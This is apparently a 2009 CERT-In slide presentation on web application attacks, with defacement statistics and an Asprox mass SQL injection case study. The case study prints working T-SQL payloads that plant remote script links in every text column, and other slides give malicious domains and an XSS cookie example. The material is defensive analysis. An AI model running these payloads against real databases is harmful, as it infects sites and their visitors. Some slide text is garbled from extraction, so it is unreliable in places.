Understanding Web Application Security Issues

Understanding Web Application

Security Issues

Pankaj Sharma January 30, 2009

Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology

• Introduction

– What are Web Applications?

– Three-layered web application model. – Secure Architecture & Threats

• Statistics of Application attacks in 2008

(April,May,June)

• Case Study

• Refrences

• Q&A

Agenda

Web Applications?

A web application is a program developed to perform a

specific function directly for the user or for another

application program. Web applications include code that

resides on the Web servers, application servers, databases,

and backend systems of an organization

.

– Client/Server Software – HTTP /HTTPS

– Browser – Web Server

Three-layered web application model

• The first layer is normally a web browser or the user

interface

• The second layer is the content generation technology

tool such as Java servlets (JSP) or Active Server Pages

(ASP),

• Third layer is the company database containing content

(e.g., news) and customer data (e.g., usernames and

passwords, social security numbers and credit card

details).

Statistics of defacement in march 2008

• In total 612 Indian websites were defaced during

March 2008.

Vulnerabilities exploited for the defacements

•

Multiple Vulnerabilities in Apache HTTP Server

CIAD-2008-03

•

Cross Site Scripting Vulnerability in Apache mod_imap

Module

CIVN-2007-163

• Apache Tomcat SingleSignOn Cookie Information

Disclosure Weakness

CVE-2008-0128

•

phpMyAdmin Local Information Disclosure

CVE-2008-1567

•

Apache Tomcat AJP Connector Information Disclosure

CVE-2006-7197

Attack Trend

Mass SQL Injection attacks and malicious Java

script embedding on websites

• Various websites have been infected with malicious JavaScript file (f**kjp DOT js) ).

• Remote attackers are launching a SQL injection attacks against web servers running ASP and embedding a link (www DOT 21179 66

DOT net/f**kjp DOT js) to malicious JavaScript file on these websites. • When a user visits the infected websites, the code gets executed onto

the user's system. Upon execution it tries to exploit several known vulnerabilities on the victim system to download some password stealing malware.

• It has also been reported that mass attacks

were launched against websites running

phpBB(PHP Bulletin Board ) through IFrame

Injection redirecting innocent users to

malicious websites.

Attack Trend

Subsequently mass IFrame and JavaScript

injection attacks have been reported using

malicious domains.

• www DOT nmidahena DOT com

• www DOT nihaorr1 DOT com,

• www DOT aspder DOT com ,

• haoliuliang DOT net ,

• winzipices DOT cn,

• yl18 DOT net,

• www DOT bluell DOT cn,

• www DOT kisswow DOT com DOT cn,

• www DOT ririwow DOT cn,

• hxxp://updatead DOT com,

• hxxp://upgradead DOT com,

Vulnerabilities exploited by the JavaScript file

– Microsoft Data Access Components Code Execution

Vulnerability (CIVN-2006-31)

– Microsoft Windows Vector Markup Language Code

Execution Vulnerability (CIVN-2007-04)

– Microsoft Internet Explorer "daxctle.ocx" KeyFrame

Memory Vulnerability. (CIVN-2006-91)

– Microsoft Internet Explorer WebViewFolderIcon Buffer

Overflow Vulnerability (CIVN-2006-94)

– RealPlayer Playlist Buffer overflow Vulnerability

(CIVN-2007-138)

Countermeasures from CERT-In

• Enable request validation by setting validateRequest=Truefalse in the Page directive or in the configuration section.

• Input Filtering: Properly sanitize user input data.

• Comment out malicious code: any scripting content to be “safely” commented out.

• Avoid cross-site scripting appending in URLs by using some special character like #,etc

http://www.vulnerable.site/welcome.html#name=<script> alert(document.cookie)<script>

• Output Filtering: Filter user data when it is sent back to the user’s browser.

• Disable client side scripting.

• Use Signed Scripting: Implement “signed scripting” such that any script with an invalid or un-trusted signature would not run

Other Countermeasures

• Microsoft has released an advisory on June 24,

2008 suggesting steps to mitigate the risk from SQL

Injection attack on websites running ASP.Net. For

details refer to Microsoft Advisory 954462 :

http://www.microsoft.com/technet/security/advisory/

954462.mspx

• A free scanner named Scrawlr has been developed

by Hewlett Packard which can identify whether sites

are susceptible to SQL injection. This tool and

support for its use can be found at:

http://www.communities.hp.com/securitysoftware/blo

gs/

spilabs/archive/2008/06/23/finding-sql-injection-with-scrawlr.

Statistics of defacement in June,2008

• In total 342 Indian websites were defaced during

June 2008.

Vulnerabilities exploited for the defacements

• Apache-SSL Authentication Bypass Vulnerability

CIVN-2008-36

• phpMyAdmin Shared Host Remote Information

Disclosure

CVE-2008-1924

• Apache Tomcat SingleSignOn Cookie Information

Disclosure Weakness

CVE-2008-0128

•

phpMyAdmin Local Information Disclosure

CVE-2008-1567

Attack Trend

SQL Injection Worm (April,May,June 2008)

•

SQL Injection Worm spreading in the wild by

injecting java scripts or iframe into websites.

• The

Asprox

botnet is also launching the SQL

Injection attacks

.

Attack Trend

• Many websites have been found infected with

such scripts.

Attack Trend

• Websites injected with java scripts are

redirecting innocent visitors to malicious

website “winzipices DOT cn”

• which is containing java scripts with numeric

names such as 2.js, 4.js.

Attack Trend

• The SQL injection worm is seems to be infecting

machines using vulnerable Real Player versions.

• Malicious domains involved in attacks with SQL

worm activity are

• cnzz DOT com,

• 51 DOT la,

• 51la DOT ajiang DOT net , and

Case Study(asprox)

• The Database Security and vulnerability

Analysis Team of CERT-In thoroughly

analyzed the attack and identified the

vulnerabilities which were being exploited to

compromise the website. After compromising

the website, the attacker used the

compromised host for further attacks over the

internet.

Case Study(asprox)

Environment:

• Operating system: Windows Server

• Web server: IIS

• Web application: ASP

• Method GET

Case Study (asprox)

• Investigation

– it was observed this SQL Injection attack

carried out on IIS web server sites that ran

with SQL Server as backend.

• Tool used to attack

– A sophisticated tool is used to scan the entire

web for potentially weak sites running

ASP.Net .This tool is called Danmec/Asprox

Case Study (asprox)

• Asprox

– Asprox initiate Google queries searching for vulnerable ASP

sites with the following query string: inurl:”.asp” inurl:“a=”.

– Parse the results and initiate the SQL injection attack

– Inject malicious JavaScript links into the back-end MS-SQL

server database.

– If this is successful, the website will display the malicious

JavaScript links in its output to clients.

– These links will force the user’s browser to download other

JavaScript code that will attempt to exploit browser flaws to install other Trojan software and perhaps steal user

Case Study (asprox)

• The attacker then the load the query string with

encoded T-SQL.

Case Study (asprox)

0%20AS%20NVARCHAR(4000));EXEC(@S);--The input encoded T-SQL would look like: GET /home/vulnerable_site.asp

Case Study (asprox)

• After decoding the SQL code looked like:

declare @m varchar(8000); set @m='';

select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';'

from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U' and b.xtype=c.xtype and c.name='varchar'; set @m=REVERSE(@m); set @m=substring(@m,PATINDEX('%;%',@m),8000); set @m=REVERSE(@m);exec(@m);

This SQL code would find all the fields with type VARCHAR from a JOIN between the sysobjects, syscolumns and systypes system tables in the databaseThis SQL statement takes all rows from the sysobjects table with type U (user table). It then matches those objects with type „varchar“. Finally, for every such object it executes an update statement which results in appending the code shown above pointing to the yl18.net site.

Case Study (asprox)

Another variation of the same type of SQL code is given below with a link to the JavaScript file 1.js .

DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR

FORSELECT a.name, b.name

FROM sysobjects a, syscolumns b WHERE a.id = b.id

AND a.xtype = 'u'

AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN

EXEC('update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+ ''<script src=http://evilsite.com/1.js></script>'''); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor;

Case Study (asprox)

• The above SQL code uses table cursors to enumerate all tables on MS SQL server and the respective columns that are of type “ntext”, “text”, “nvarchar”, or “varchar” and the table type is a user table and not a system table.

• The code then proceeds to utilize a cursor while loop to iterate through the returned results updating each table.columname concatenating it's current value with an arbitrary value.

• The code converts the current data to varchar during concatenation to avoid any cast issues and removes any trailing space to the right of the field value.

• The cursor is deallocated after update.

• So finally it finds all text fields in the database and adds a link to malicious JavaScript file to each field.

•

These JavaScript files links will force the user’s browser to download other JavaScript code that will attempt to exploit browser flaws to install

Identification Case Study (asprox)

•Identification of Attack

•Identification requires that database administrators (DBA) review all databases providing services to web applications

.

•Review access controls and privileges granted to web application accounts. Privileges should not exceed those specified by the application owner.

•Look for the presence of unexpected HTML tags in records of the database related with the application. These unexpected HTML tags in application table

records may be an indicator that the online service has been compromised and that immediate action is

Web Administrators should review server-side

components of online services which access

databases.

• Identify online service components with insufficient

validation controls. Validation controls ensure the

data conforms to the expected format, size and

value.

• Identify online service components which allow, or

are vulnerable to, improper data conversions. Data

must be converted to its simplest form prior to

being accepted for further processing.

Identification Case Study (asprox)

Containment and Eradication (Case Study )

The following actions can be taken to mitigate the security risk: • Shutdown the service until the system will recover fully from

the attack.

• Validate the account that are used from the web application

have least possible privilege in the database

• Implement strict database access controls to restrict online services to read only access;

• Implement filters that will convert dangerous data into an

inoffensive form;(replace all unwanted html tags if any from the databases)

• Put the database offline or recover clean data from a backup.

• Monitoring tools for Web and Database server should be

Recommendations for Web developers

•

Review the security of web application

•

Review of online services security

•

Review of network security

•

Review IIS logs and database tables for signs of

previous exploits

•

Review of database security;

•

Perform Vulnerability testing using specialized

tools for online services, network and database

security.

Recommendation for Database Administrators

•

Do security audit all databases used by web

servers.

•

DBA should particularly check for:

–

The presence of unexpected HTML tags

Database Administrators should search all

tables for the presence of unexpected

HTML tags such as:

•

SCRIPT

•

IFRAME

•

FRAME

Recommendation for Database Administrators

Review Access controls and privileges for

web application.

• Review privileges to the following:

• SQL Statements SELECT, GRANT, ,

UPDATE, DELETE, GRANT etc.

• Data definition language elements (CREATE,

ALTER etc.)

References

•

http://isc.sans.org/diary.html?storyid=429

4

•

http://www.breach.com/resources/breach-

security-labs/alerts/breach-security-labs-

releases-alert-on-asprox-mass-sql-injection1.html

•

http://it.toolbox.com/blogs/programming-

life/a-look-at-aprils-mass-sql-injection-

attack-for-aspnet-sql-server-environments-25388

Thanks